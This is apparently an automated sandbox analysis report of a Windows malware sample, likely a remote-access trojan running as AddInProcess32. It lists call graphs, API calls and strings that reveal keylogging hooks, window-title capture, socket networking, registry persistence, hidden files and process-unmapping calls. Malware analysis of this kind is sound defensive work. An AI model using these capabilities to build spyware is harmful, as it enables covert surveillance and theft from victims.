439997 47649 4399c6 47648->47649 47666 43a58a 42 API calls __Toupper 47648->47666 47650 439a32 47649->47650 47667 43a4f1 26 API calls 2 library calls 47649->47667 47668 43a4f1 26 API calls 2 library calls 47650->47668 47653 439af9 _strftime 47653->47655 47669 445354 20 API calls _abort 47653->47669 47655->46928 47655->46929 47657 43a54a 47656->47657 47658 43a55d 47656->47658 47670 445354 20 API calls _abort 47657->47670 47658->47641 47660 43a54f 47671 43a827 26 API calls _Deallocate 47660->47671 47662 43a55a 47662->47641 47663->47645 47664->47655 47665->47648 47666->47648 47667->47650 47668->47653 47669->47655 47670->47660 47671->47662 47676 401e9b 47672->47676 47674 4027d9 47674->47283 47675->47287 47677 401ea7 47676->47677 47678 40245c 28 API calls 47677->47678 47679 401eb9 47678->47679 47679->47674 47681 409855 47680->47681 47682 4124b7 3 API calls 47681->47682 47683 40985c 47682->47683 47684 409870 47683->47684 47685 40988a 47683->47685 47687 4095cf 47684->47687 47688 409875 47684->47688 47699 4082dc 47685->47699 47687->46964 47689 4082dc 28 API calls 47688->47689 47691 409883 47689->47691 47725 409959 29 API calls 47691->47725 47694 409888 47694->47687 47695->47313 47866 402d8b 47696->47866 47698 4028dd 47698->47316 47700 4082eb 47699->47700 47726 408431 47700->47726 47702 408309 47703 4098a5 47702->47703 47731 40affa 47703->47731 47706 4098f6 47708 401f66 28 API calls 47706->47708 47707 4098ce 47709 401f66 28 API calls 47707->47709 47710 409901 47708->47710 47711 4098d8 47709->47711 47713 401f66 28 API calls 47710->47713 47712 41ae08 28 API calls 47711->47712 47714 4098e6 47712->47714 47715 409910 47713->47715 47735 40a876 31 API calls _Yarn 47714->47735 47717 41a686 79 API calls 47715->47717 47719 409915 CreateThread 47717->47719 47718 4098ed 47720 401eea 26 API calls 47718->47720 47721 409930 CreateThread 47719->47721 47722 40993c CreateThread 47719->47722 47747 4099a9 47719->47747 47720->47706 47721->47722 47744 409993 47721->47744 47723 401e13 26 API 
calls 47722->47723 47741 4099b5 47722->47741 47724 409950 47723->47724 47724->47687 47725->47694 47865 40999f 135 API calls 47725->47865 47727 40843d 47726->47727 47728 40845b 47727->47728 47730 402f0d 28 API calls 47727->47730 47728->47702 47730->47728 47733 40b006 47731->47733 47732 4098c3 47732->47706 47732->47707 47733->47732 47736 403b9e 47733->47736 47735->47718 47737 403ba8 47736->47737 47739 403bb3 47737->47739 47740 403cfd 28 API calls 47737->47740 47739->47732 47740->47739 47750 40a3f4 47741->47750 47799 4099e4 47744->47799 47820 409e48 47747->47820 47777 40a402 47750->47777 47751 4099be 47752 40a45c Sleep GetForegroundWindow GetWindowTextLengthW 47753 40b027 28 API calls 47752->47753 47753->47777 47756 41aca0 GetTickCount 47756->47777 47758 40a4a2 GetWindowTextW 47758->47777 47760 401e13 26 API calls 47760->47777 47761 40a5ff 47763 401e13 26 API calls 47761->47763 47762 40affa 28 API calls 47762->47777 47763->47751 47764 40a569 Sleep 47764->47777 47767 401f66 28 API calls 47767->47777 47768 40a4f1 47770 4082dc 28 API calls 47768->47770 47768->47777 47783 40a876 31 API calls _Yarn 47768->47783 47770->47768 47772 405ce6 28 API calls 47772->47777 47774 4028cf 28 API calls 47774->47777 47775 41ae08 28 API calls 47775->47777 47776 409d58 27 API calls 47776->47777 47777->47751 47777->47752 47777->47756 47777->47758 47777->47760 47777->47761 47777->47762 47777->47764 47777->47767 47777->47768 47777->47772 47777->47774 47777->47775 47777->47776 47778 401eea 26 API calls 47777->47778 47779 433519 5 API calls __Init_thread_wait 47777->47779 47780 4338a5 29 API calls __onexit 47777->47780 47781 4334cf EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 47777->47781 47782 4082a8 28 API calls 47777->47782 47784 40b0dd 28 API calls 47777->47784 47785 40ae58 44 API calls 2 library calls 47777->47785 47786 440c51 47777->47786 47790 404c9e 28 API calls 47777->47790 47778->47777 47779->47777 47780->47777 47781->47777 47782->47777 47783->47768 47784->47777 
47785->47777 47787 440c5d 47786->47787 47791 440a4d 47787->47791 47790->47777 47792 440a64 47791->47792 47796 440aa5 47792->47796 47797 445354 20 API calls _abort 47792->47797 47794 440a9b 47798 43a827 26 API calls _Deallocate 47794->47798 47796->47777 47797->47794 47798->47796 47800 409a63 GetMessageA 47799->47800 47801 4099ff GetModuleHandleA SetWindowsHookExA 47799->47801 47802 409a75 TranslateMessage DispatchMessageA 47800->47802 47803 40999c 47800->47803 47801->47800 47804 409a1b GetLastError 47801->47804 47802->47800 47802->47803 47814 41ad46 47804->47814 47808 409a3e 47809 401f66 28 API calls 47808->47809 47810 409a4d 47809->47810 47811 41a686 79 API calls 47810->47811 47812 409a52 47811->47812 47813 401eea 26 API calls 47812->47813 47813->47803 47815 440c51 26 API calls 47814->47815 47816 41ad67 47815->47816 47817 401f66 28 API calls 47816->47817 47818 409a31 47817->47818 47819 404c9e 28 API calls 47818->47819 47819->47808 47821 409e5d Sleep 47820->47821 47840 409d97 47821->47840 47823 4099b2 47824 409e9d CreateDirectoryW 47828 409e6f 47824->47828 47825 409eae GetFileAttributesW 47825->47828 47826 409ec5 SetFileAttributesW 47826->47828 47828->47821 47828->47823 47828->47824 47828->47825 47828->47826 47830 401d64 28 API calls 47828->47830 47838 409f10 47828->47838 47853 41b58f 47828->47853 47829 409f3f PathFileExistsW 47829->47838 47830->47828 47831 401f86 28 API calls 47831->47838 47833 40a048 SetFileAttributesW 47833->47828 47834 406052 28 API calls 47834->47838 47835 401eef 26 API calls 47835->47838 47836 401eea 26 API calls 47836->47838 47838->47829 47838->47831 47838->47833 47838->47834 47838->47835 47838->47836 47839 401eea 26 API calls 47838->47839 47862 41b61a 32 API calls 47838->47862 47863 41b687 CreateFileW SetFilePointer WriteFile CloseHandle 47838->47863 47839->47828 47841 409e44 47840->47841 47846 409dad 47840->47846 47841->47828 47842 409dcc CreateFileW 47843 409dda GetFileSize 47842->47843 47842->47846 47844 409e0f CloseHandle 47843->47844 
47843->47846 47844->47846 47845 409e21 47845->47841 47850 4082dc 28 API calls 47845->47850 47846->47842 47846->47844 47846->47845 47847 409e04 Sleep 47846->47847 47848 409dfd 47846->47848 47847->47844 47864 40a7f0 83 API calls 47848->47864 47851 409e3d 47850->47851 47852 4098a5 126 API calls 47851->47852 47852->47841 47854 41b5a2 CreateFileW 47853->47854 47856 41b5db 47854->47856 47857 41b5df 47854->47857 47856->47828 47858 41b5f6 WriteFile 47857->47858 47859 41b5e6 SetFilePointer 47857->47859 47860 41b609 47858->47860 47861 41b60b CloseHandle 47858->47861 47859->47858 47859->47861 47860->47861 47861->47856 47862->47838 47863->47838 47864->47847 47867 402d97 47866->47867 47870 4030f7 47867->47870 47869 402dab 47869->47698 47871 403101 47870->47871 47873 403115 47871->47873 47874 4036c2 28 API calls 47871->47874 47873->47869 47874->47873 47876 403b48 47875->47876 47882 403b7a 47876->47882 47879 403cbb 47886 403dc2 47879->47886 47881 403cc9 47881->47324 47883 403b86 47882->47883 47884 403b9e 28 API calls 47883->47884 47885 403b5a 47884->47885 47885->47879 47887 403dce 47886->47887 47890 402ffd 47887->47890 47889 403de3 47889->47881 47891 40300e 47890->47891 47892 4032a4 28 API calls 47891->47892 47893 40301a 47892->47893 47895 40302e 47893->47895 47896 4035e8 28 API calls 47893->47896 47895->47889 47896->47895 47903 4395ba 47897->47903 47901 412814 47900->47901 47902 4127ed RegSetValueExA RegCloseKey 47900->47902 47901->47350 47902->47901 47906 43953b 47903->47906 47905 401608 47905->47348 47907 43954a 47906->47907 47908 43955e 47906->47908 47914 445354 20 API calls _abort 47907->47914 47913 43955a __alldvrm 47908->47913 47916 447601 11 API calls 2 library calls 47908->47916 47910 43954f 47915 43a827 26 API calls _Deallocate 47910->47915 47913->47905 47914->47910 47915->47913 47916->47913 47920 41aab9 _Yarn ___scrt_fastfail 47917->47920 47918 401f66 28 API calls 47919 41ab2e 47918->47919 47919->47354 47920->47918 47921->47370 47923 413fb3 getaddrinfo WSASetLastError 
47922->47923 47924 413fa9 47922->47924 47923->47420 48061 413e37 35 API calls ___std_exception_copy 47924->48061 47926 413fae 47926->47923 47928 404206 socket 47927->47928 47929 4041fd 47927->47929 47931 404220 47928->47931 47932 404224 CreateEventW 47928->47932 48062 404262 WSAStartup 47929->48062 47931->47420 47932->47420 47933 404202 47933->47928 47933->47931 47935 4049b1 47934->47935 47936 40492a 47934->47936 47935->47420 47937 404933 47936->47937 47938 404987 CreateEventA CreateThread 47936->47938 47939 404942 GetLocalTime 47936->47939 47937->47938 47938->47935 48064 404b1d 47938->48064 47940 41ad46 28 API calls 47939->47940 47941 40495b 47940->47941 48063 404c9e 28 API calls 47941->48063 47943 404968 47944 401f66 28 API calls 47943->47944 47945 404977 47944->47945 47946 41a686 79 API calls 47945->47946 47947 40497c 47946->47947 47948 401eea 26 API calls 47947->47948 47948->47938 47950 4043e1 47949->47950 47951 4042b3 47949->47951 47952 404343 47950->47952 47953 4043e7 WSAGetLastError 47950->47953 47951->47952 47954 4042e8 47951->47954 47957 404cbf 28 API calls 47951->47957 47952->47420 47953->47952 47955 4043f7 47953->47955 48068 420151 27 API calls 47954->48068 47958 4042f7 47955->47958 47959 4043fc 47955->47959 47961 4042d4 47957->47961 47964 401f66 28 API calls 47958->47964 48073 41bc76 30 API calls 47959->48073 47960 4042f0 47960->47958 47963 404306 47960->47963 47965 401f66 28 API calls 47961->47965 47974 404315 47963->47974 47975 40434c 47963->47975 47968 404448 47964->47968 47969 4042e3 47965->47969 47966 40440b 48074 404c9e 28 API calls 47966->48074 47971 401f66 28 API calls 47968->47971 47972 41a686 79 API calls 47969->47972 47970 404418 47973 401f66 28 API calls 47970->47973 47976 404457 47971->47976 47972->47954 47977 404427 47973->47977 47979 401f66 28 API calls 47974->47979 48070 420f34 56 API calls 47975->48070 47980 41a686 79 API calls 47976->47980 47981 41a686 79 API calls 47977->47981 47983 404324 47979->47983 47980->47952 47984 40442c 
47981->47984 47982 404354 47985 404389 47982->47985 47986 404359 47982->47986 47987 401f66 28 API calls 47983->47987 47988 401eea 26 API calls 47984->47988 48072 4202ea 28 API calls 47985->48072 47989 401f66 28 API calls 47986->47989 47990 404333 47987->47990 47988->47952 47993 404368 47989->47993 47994 41a686 79 API calls 47990->47994 47992 404391 47995 4043be CreateEventW CreateEventW 47992->47995 47997 401f66 28 API calls 47992->47997 47996 401f66 28 API calls 47993->47996 48007 404338 47994->48007 47995->47952 47998 404377 47996->47998 48000 4043a7 47997->48000 48001 41a686 79 API calls 47998->48001 48002 401f66 28 API calls 48000->48002 48003 40437c 48001->48003 48004 4043b6 48002->48004 48071 420592 54 API calls 48003->48071 48006 41a686 79 API calls 48004->48006 48008 4043bb 48006->48008 48069 41dc15 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 48007->48069 48008->47995 48075 41a945 GlobalMemoryStatusEx 48009->48075 48011 41a982 48011->47420 48076 413646 48012->48076 48016 40cc0d 48015->48016 48017 41246e 3 API calls 48016->48017 48019 40cc14 48017->48019 48018 40cc2c 48018->47420 48019->48018 48020 4124b7 3 API calls 48019->48020 48020->48018 48022 401f86 28 API calls 48021->48022 48023 41ae03 48022->48023 48023->47420 48025 41aed5 48024->48025 48026 401f86 28 API calls 48025->48026 48027 41aee7 48026->48027 48027->47420 48029 41acb6 GetTickCount 48028->48029 48029->47437 48031 436050 ___scrt_fastfail 48030->48031 48032 41ac71 GetForegroundWindow GetWindowTextW 48031->48032 48033 403b40 28 API calls 48032->48033 48034 41ac9b 48033->48034 48034->47437 48036 401f66 28 API calls 48035->48036 48037 40e69e 48036->48037 48037->47437 48038->47437 48051 4045ec 48039->48051 48040 43a88c _Yarn 21 API calls 48040->48051 48042 40465b 48044 404666 48042->48044 48042->48051 48043 401f86 28 API calls 48043->48051 48121 4047eb 98 API calls 48044->48121 48045 401eef 26 API calls 48045->48051 48047 40466d 48049 401eea 26 API calls 48047->48049 48048 401eea 
26 API calls 48048->48051 48050 404676 48049->48050 48052 401eea 26 API calls 48050->48052 48051->48040 48051->48042 48051->48043 48051->48045 48051->48048 48109 404688 48051->48109 48120 40455b 59 API calls 48051->48120 48053 40467f 48052->48053 48053->47443 48055->47420 48056->47443 48057->47443 48058->47437 48059->47443 48060->47443 48061->47926 48062->47933 48063->47943 48067 404b29 101 API calls 48064->48067 48066 404b26 48067->48066 48068->47960 48069->47952 48070->47982 48071->48007 48072->47992 48073->47966 48074->47970 48075->48011 48079 413619 48076->48079 48080 41362e ___scrt_initialize_default_local_stdio_options 48079->48080 48083 43e2dd 48080->48083 48086 43b030 48083->48086 48087 43b070 48086->48087 48088 43b058 48086->48088 48087->48088 48090 43b078 48087->48090 48103 445354 20 API calls _abort 48088->48103 48105 4392de 38 API calls 3 library calls 48090->48105 48091 43b05d 48104 43a827 26 API calls _Deallocate 48091->48104 48094 43b088 48106 43b7b6 20 API calls 2 library calls 48094->48106 48095 433d2c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 48097 41363c 48095->48097 48097->47420 48098 43b100 48107 43be24 50 API calls 3 library calls 48098->48107 48100 43b10b 48108 43b820 20 API calls _free 48100->48108 48102 43b068 48102->48095 48103->48091 48104->48102 48105->48094 48106->48098 48107->48100 48108->48102 48115 4046a3 48109->48115 48110 4047d8 48111 401eea 26 API calls 48110->48111 48112 4047e1 48111->48112 48112->48042 48113 403b60 28 API calls 48113->48115 48114 401eef 26 API calls 48114->48115 48115->48110 48115->48113 48115->48114 48116 401eea 26 API calls 48115->48116 48117 401ebd 28 API calls 48115->48117 48118 401fbd 28 API calls 48115->48118 48116->48115 48119 404772 CreateEventA CreateThread WaitForSingleObject CloseHandle 48117->48119 48118->48115 48119->48115 48122 414b9b 48119->48122 48120->48051 48121->48047 48123 401fbd 28 API calls 48122->48123 48124 414bbd SetEvent 48123->48124 48125 414bd2 48124->48125 
48126 403b60 28 API calls 48125->48126 48127 414bec 48126->48127 48128 401fbd 28 API calls 48127->48128 48129 414bfc 48128->48129 48130 401fbd 28 API calls 48129->48130 48131 414c0e 48130->48131 48132 41afc3 28 API calls 48131->48132 48133 414c17 48132->48133 48134 4161f2 48133->48134 48136 414de3 48133->48136 48137 414c37 GetTickCount 48133->48137 48135 401d8c 26 API calls 48134->48135 48138 4161fb 48135->48138 48136->48134 48196 414d99 48136->48196 48139 41ad46 28 API calls 48137->48139 48140 401eea 26 API calls 48138->48140 48141 414c4d 48139->48141 48144 416207 48140->48144 48145 41aca0 GetTickCount 48141->48145 48143 414d7d 48143->48134 48147 401eea 26 API calls 48144->48147 48146 414c54 48145->48146 48148 41ad46 28 API calls 48146->48148 48149 416213 48147->48149 48150 414c5f 48148->48150 48151 41ac52 30 API calls 48150->48151 48152 414c6d 48151->48152 48153 41aec8 28 API calls 48152->48153 48154 414c7b 48153->48154 48155 401d64 28 API calls 48154->48155 48156 414c89 48155->48156 48201 4027ec 28 API calls 48156->48201 48158 414c97 48202 40275c 28 API calls 48158->48202 48160 414ca6 48161 4027cb 28 API calls 48160->48161 48162 414cb5 48161->48162 48203 40275c 28 API calls 48162->48203 48164 414cc4 48165 4027cb 28 API calls 48164->48165 48166 414cd0 48165->48166 48204 40275c 28 API calls 48166->48204 48168 414cda 48205 404468 60 API calls _Yarn 48168->48205 48170 414ce9 48171 401eea 26 API calls 48170->48171 48172 414cf2 48171->48172 48173 401eea 26 API calls 48172->48173 48174 414cfe 48173->48174 48175 401eea 26 API calls 48174->48175 48176 414d0a 48175->48176 48177 401eea 26 API calls 48176->48177 48178 414d16 48177->48178 48179 401eea 26 API calls 48178->48179 48180 414d22 48179->48180 48181 401eea 26 API calls 48180->48181 48182 414d2e 48181->48182 48183 401e13 26 API calls 48182->48183 48184 414d3a 48183->48184 48185 401eea 26 API calls 48184->48185 48186 414d43 48185->48186 48187 401eea 26 API calls 48186->48187 48188 414d4c 48187->48188 48189 401d64 28 
API calls 48188->48189 48190 414d57 48189->48190 48191 43a5e7 _strftime 42 API calls 48190->48191 48192 414d64 48191->48192 48193 414d69 48192->48193 48194 414d8f 48192->48194 48197 414d82 48193->48197 48198 414d77 48193->48198 48195 401d64 28 API calls 48194->48195 48195->48196 48196->48134 48207 404ab1 83 API calls 48196->48207 48200 404915 104 API calls 48197->48200 48206 4049ba 81 API calls 48198->48206 48200->48143 48201->48158 48202->48160 48203->48164 48204->48168 48205->48170 48206->48143 48207->48143 48209->47469 48210->47496 48211->47495 48212->47484 48213->47488 48214->47494 48216 40e56a 48215->48216 48217 4124b7 3 API calls 48216->48217 48219 40e60e 48216->48219 48221 40e5fe Sleep 48216->48221 48237 40e59c 48216->48237 48217->48216 48218 4082dc 28 API calls 48218->48237 48220 4082dc 28 API calls 48219->48220 48223 40e619 48220->48223 48221->48216 48222 41ae08 28 API calls 48222->48237 48225 41ae08 28 API calls 48223->48225 48226 40e625 48225->48226 48250 412774 29 API calls 48226->48250 48229 401e13 26 API calls 48229->48237 48230 40e638 48231 401e13 26 API calls 48230->48231 48233 40e644 48231->48233 48232 401f66 28 API calls 48232->48237 48234 401f66 28 API calls 48233->48234 48235 40e655 48234->48235 48238 4126d2 29 API calls 48235->48238 48236 4126d2 29 API calls 48236->48237 48237->48218 48237->48221 48237->48222 48237->48229 48237->48232 48237->48236 48248 40bf04 73 API calls ___scrt_fastfail 48237->48248 48249 412774 29 API calls 48237->48249 48239 40e668 48238->48239 48251 411699 TerminateProcess WaitForSingleObject 48239->48251 48241 40e670 ExitProcess 48252 411637 61 API calls 48243->48252 48249->48237 48250->48230 48251->48241

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
• GetProcAddress.KERNEL32(00000000), ref: 0041BD01
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
• GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
• LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
• GetProcAddress.KERNEL32(00000000), ref: 0041BD30
• LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
• GetProcAddress.KERNEL32(00000000), ref: 0041BD44
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
• GetProcAddress.KERNEL32(00000000), ref: 0041BD58
• LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
• GetProcAddress.KERNEL32(00000000), ref: 0041BD68
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
• GetProcAddress.KERNEL32(00000000), ref: 0041BD78
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
• GetProcAddress.KERNEL32(00000000), ref: 0041BD88
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
• GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
• GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
• GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
• GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                        • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                                                                        • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                        • API String ID: 384173800-625181639
                                                                                                        • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                        • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                                                        • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                        • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1259 4099e4-4099fd 1260 409a63-409a73 GetMessageA 1259->1260 1261 4099ff-409a19 GetModuleHandleA SetWindowsHookExA 1259->1261 1262 409a75-409a8d TranslateMessage DispatchMessageA 1260->1262 1263 409a8f 1260->1263 1261->1260 1264 409a1b-409a61 GetLastError call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1261->1264 1262->1260 1262->1263 1265 409a91-409a96 1263->1265 1264->1265
                                                                                                        APIs
                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                        • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                        • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                        • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                        • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                        Strings
                                                                                                        • Keylogger initialization failure: error , xrefs: 00409A32
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                        • String ID: Keylogger initialization failure: error
                                                                                                        • API String ID: 3219506041-952744263
                                                                                                        • Opcode ID: 04eaad81753b9e27949701049d8d5bd2de999136c2a6d130b4221f81ecb2367e
                                                                                                        • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                                                        • Opcode Fuzzy Hash: 04eaad81753b9e27949701049d8d5bd2de999136c2a6d130b4221f81ecb2367e
                                                                                                        • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                          • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                          • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 0040E603
                                                                                                        • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                        • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                        • API String ID: 2281282204-3981147832
                                                                                                        • Opcode ID: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                                        • Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
                                                                                                        • Opcode Fuzzy Hash: dca5ffa1f26a58f88eabcf4e1c6adf70a88f5eb93220c74e9f8d60f60b37ffdd
                                                                                                        • Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1419 404915-404924 1420 4049b1 1419->1420 1421 40492a-404931 1419->1421 1422 4049b3-4049b7 1420->1422 1423 404933-404937 1421->1423 1424 404939-404940 1421->1424 1425 404987-4049af CreateEventA CreateThread 1423->1425 1424->1425 1426 404942-404982 GetLocalTime call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1424->1426 1425->1422 1426->1425
                                                                                                        APIs
                                                                                                        • GetLocalTime.KERNEL32(00000001,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404946
                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00473EE8,004745A8,00000000,?,?,?,?,?,00414D8A,?,00000001), ref: 00404994
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                        Strings
                                                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Create$EventLocalThreadTime
                                                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                                                        • API String ID: 2532271599-1507639952
                                                                                                        • Opcode ID: ee3ad1be35f4293743414279c88800ade4f2d806fe95fc1c64c02c4606088ff0
                                                                                                        • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                                        • Opcode Fuzzy Hash: ee3ad1be35f4293743414279c88800ade4f2d806fe95fc1c64c02c4606088ff0
                                                                                                        • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                                        APIs
                                                                                                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                                                        • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                                                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 1815803762-0
                                                                                                        • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                        • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
